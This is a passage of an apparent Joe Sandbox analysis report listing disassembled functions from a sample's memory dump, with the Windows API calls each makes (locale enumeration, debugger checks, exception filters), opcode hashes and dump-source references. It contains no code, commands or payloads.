                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Gc$Gc
                                                                    • API String ID: 0-2169354771
                                                                    • Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
                                                                    • Instruction ID: bc14f21a40b96910c942b84315ca7d43721608e890b0df0075ea2c7ffc5b44db
                                                                    • Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
                                                                    • Instruction Fuzzy Hash: 65F14071E002199FEF14CFA8D894AEEB7B2FF89314F158269E815A7381D7309E45CB94
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
                                                                    • Instruction ID: c59ddb4efb75e201bbb72699a5922d8cd9d140414e8d2b12298a4593094482dc
                                                                    • Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
                                                                    • Instruction Fuzzy Hash: 93B12772E042659FDB158F68C891BEEBBB6EF55310F14816EE805AF341D2349E06CBE0
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0062792E
                                                                    • IsDebuggerPresent.KERNEL32 ref: 006279FA
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00627A13
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00627A1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: a39b72bda79d0b6f1efdad3f856aaa534233f0d568c0316942122e8353a4ecb3
                                                                    • Instruction ID: cb493bc90e7985a1ff8e2e6df42a5a496bfa72ecba250c7da6bfe3ec3d52aa15
                                                                    • Opcode Fuzzy Hash: a39b72bda79d0b6f1efdad3f856aaa534233f0d568c0316942122e8353a4ecb3
                                                                    • Instruction Fuzzy Hash: 0531F775D062289BDB60DFA4DD49BCDBBB8AF08700F1041EAE40CAB250EB709B858F45
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C4EC
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C536
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C5FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 661929714-0
                                                                    • Opcode ID: 64f8cd4780afbc4adb8c81063684e160d218e820cb04d066fc954bae03ca1172
                                                                    • Instruction ID: 24685c0772a26192c29c1a95e2f78ab8825e0d97a912fc6695ed8b0a0c832549
                                                                    • Opcode Fuzzy Hash: 64f8cd4780afbc4adb8c81063684e160d218e820cb04d066fc954bae03ca1172
                                                                    • Instruction Fuzzy Hash: 446195729002179FDF68DF24CC82BBA77AAEF05320F108179F905E6685E774E951CB94
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0062DB6B
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0062DB75
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0062DB82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 1bab7450acca1c398571bfb89ace22af8cce682e399f3bdff8dc7376f1ae5e27
                                                                    • Instruction ID: 743696c9e2f79fe406a3d07204274057b8e96536952e521e0c884b73b2d2aa8e
                                                                    • Opcode Fuzzy Hash: 1bab7450acca1c398571bfb89ace22af8cce682e399f3bdff8dc7376f1ae5e27
                                                                    • Instruction Fuzzy Hash: 9B31C474901628ABCB61DF64EC89BCCBBB9BF18710F5041DAE41CA7290EB749F858F44
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006323AE,?,20001004,00000000,00000002,?,?,006319B0), ref: 0063625F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: R[b
                                                                    • API String ID: 2299586839-1787471655
                                                                    • Opcode ID: caaa77e9b858687b7488eda8caa1e4859970838165a7b1d54acd7cde06a37830
                                                                    • Instruction ID: cc5fe916047a97c35cccc85228a58204f11e1a76b7a558dd12e7ea8025d0f6a9
                                                                    • Opcode Fuzzy Hash: caaa77e9b858687b7488eda8caa1e4859970838165a7b1d54acd7cde06a37830
                                                                    • Instruction Fuzzy Hash: 48E04F36500228BBCF122F61DC08AAE7F2BEF45760F01C014FD0566221CB718E21AAE5
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00635727,?,?,00000008,?,?,006415F5,00000000), ref: 00635959
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 3e574824ec1b0c67d3763f71f88391b901adc048d2c096bcaf94881bc2ddaf5d
                                                                    • Instruction ID: b417a481175eb663ce9686596ebc89ef16fa41c0448bc91e13e426c4251d4cff
                                                                    • Opcode Fuzzy Hash: 3e574824ec1b0c67d3763f71f88391b901adc048d2c096bcaf94881bc2ddaf5d
                                                                    • Instruction Fuzzy Hash: BAB13D35610A04DFD715CF28C486BA57BE2FF45364F258659E89ACF3A1C335E992CB80
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006272B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: d32996e609ec5e52446de85a3bf1a748372826c75b7c8b777c123e254fe29ca8
                                                                    • Instruction ID: 487b4ec1dcd60258af151d734752d779c0a84103436731614edb54fb62d5bd1a
                                                                    • Opcode Fuzzy Hash: d32996e609ec5e52446de85a3bf1a748372826c75b7c8b777c123e254fe29ca8
                                                                    • Instruction Fuzzy Hash: 98A18CB5E05615CFDB18CF68E882AAABBF2FB49714F14A16ED409E73A0C7349841CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e689c9a1e91ad08a13cb36482d4d74f25be7e0837867fc9a23f0f586d431b7e
                                                                    • Instruction ID: fec5c168fc5d06108d53ab75fbe34b6ca745fc2f8848d645dfa993585b203d46
                                                                    • Opcode Fuzzy Hash: 0e689c9a1e91ad08a13cb36482d4d74f25be7e0837867fc9a23f0f586d431b7e
                                                                    • Instruction Fuzzy Hash: A431D976900219AFCB20DFA8DC85DFBB7BEEB84714F144558F90597245E670AE40CFA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: ba114e660d621db906c3d6c3a387f7ccbc5e9dcc3ef19a739f16b9afe783f5cb
                                                                    • Instruction ID: 04dccbdcf2b6a641998dda1de873f1c9aed0449914d8f1ed0a01e30b7d10710d
                                                                    • Opcode Fuzzy Hash: ba114e660d621db906c3d6c3a387f7ccbc5e9dcc3ef19a739f16b9afe783f5cb
                                                                    • Instruction Fuzzy Hash: F9C1B270600E668FCB24CF28E4916BEBBB3AF45321F244A1DD4969B791C731AD46CF91
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C73F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 3736152602-0
                                                                    • Opcode ID: 949d9671f7142102a8c81ff06d92fe784d00dd29154a442a9e41af481efc8c87
                                                                    • Instruction ID: 64ec7b6642fc175e36196ff341214e10953f9e48a5e00f7c8d4516ff0fe3e29b
                                                                    • Opcode Fuzzy Hash: 949d9671f7142102a8c81ff06d92fe784d00dd29154a442a9e41af481efc8c87
                                                                    • Instruction Fuzzy Hash: 0421B636605206ABEB58AF25DC42ABA73BAEF45360F10007EFD05E6241EB34ED018F94
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • EnumSystemLocalesW.KERNEL32(0063C498,00000001,00000000,?,-00000050,?,0063CAC9,00000000,?,?,?,00000055,?), ref: 0063C3E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: 97d865c76b31536395c4a8becec925c744d4569459b6657f683ecf1798addaef
                                                                    • Instruction ID: 852e475ed93d51748d1f5ff076ae3dc752bf9fd4dd0a7d07b3c6ca06c326ce19
                                                                    • Opcode Fuzzy Hash: 97d865c76b31536395c4a8becec925c744d4569459b6657f683ecf1798addaef
                                                                    • Instruction Fuzzy Hash: 0911253B2007015FEB189F38C8A15BABBA2FF80768F14842CE94797B40D771B942C780
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0063C6B4,00000000,00000000,?), ref: 0063C946
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 3736152602-0
                                                                    • Opcode ID: 706e9b63288b6c980824cf551726e9a4c47639f9b6a58b91679fe290326a3d9d
                                                                    • Instruction ID: 7c838d769966529704cc54bf7233401976585e55fdd1e67735f8e6c63b6c8134
                                                                    • Opcode Fuzzy Hash: 706e9b63288b6c980824cf551726e9a4c47639f9b6a58b91679fe290326a3d9d
                                                                    • Instruction Fuzzy Hash: 40F0A937500611BBDB245665C805BFAB75AEB40774F164428FD56B72C0DA74FE41C7D0
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • EnumSystemLocalesW.KERNEL32(0063C6EB,00000001,?,?,-00000050,?,0063CA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0063C457
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: fd720321e11bc812d58d86843d75cd6616825ef1726d18b037c1345648e2a0d9
                                                                    • Instruction ID: 4361a22a5bb2003d389c14e8fa4851fbf38860701b7d78cf675f327c5a1a11c3
                                                                    • Opcode Fuzzy Hash: fd720321e11bc812d58d86843d75cd6616825ef1726d18b037c1345648e2a0d9
                                                                    • Instruction Fuzzy Hash: 22F022362003045FDB245F38DC91ABABBD2EB81B78F05802CF9069B681C671AC02C790
                                                                    APIs
                                                                      • Part of subcall function 0062DDC1: EnterCriticalSection.KERNEL32(?,?,00634B89,?,0064C2E0,00000008,00634D4D,?,0062C446,?), ref: 0062DDD0
                                                                    • EnumSystemLocalesW.KERNEL32(00635D72,00000001,0064C3A0,0000000C,00636127,00000000), ref: 00635DB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                    • String ID:
                                                                    • API String ID: 1272433827-0
                                                                    • Opcode ID: 0be46f9c9a5cb5dbdcfaa3a92ad5da6d9c01554f1fafce6a57ee9398d5ea6305
                                                                    • Instruction ID: 1bc7e02672c20e0d60dc5265bb96a0b8af7365b08480673722132913d44b2434
                                                                    • Opcode Fuzzy Hash: 0be46f9c9a5cb5dbdcfaa3a92ad5da6d9c01554f1fafce6a57ee9398d5ea6305
                                                                    • Instruction Fuzzy Hash: 27F04976A00614EFD700EF98E842B9D7BB2EB45761F20511AF4019B2A1C7B55944CF88
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • EnumSystemLocalesW.KERNEL32(0063C280,00000001,?,?,?,0063CAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0063C35E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2417226690-0
                                                                    • Opcode ID: 942c3677e4747b263f9926eee5e1e3297c00e02ee00a3aee5d9134401cb493fa
                                                                    • Instruction ID: 012472405a2aa7261b33c4cadbd44124ecf00871748a94682a65363ed2a3e98b
                                                                    • Opcode Fuzzy Hash: 942c3677e4747b263f9926eee5e1e3297c00e02ee00a3aee5d9134401cb493fa
                                                                    • Instruction Fuzzy Hash: 82F0E53A30030557DB149F75DC45AAABF96EFC1B70F064058FA098B790C6719942C7D0
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00626DC9), ref: 00627AB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: dd41b8ec75ebc3062ae16d529f0e7698ebe5900682256dd735263e4e796cae81
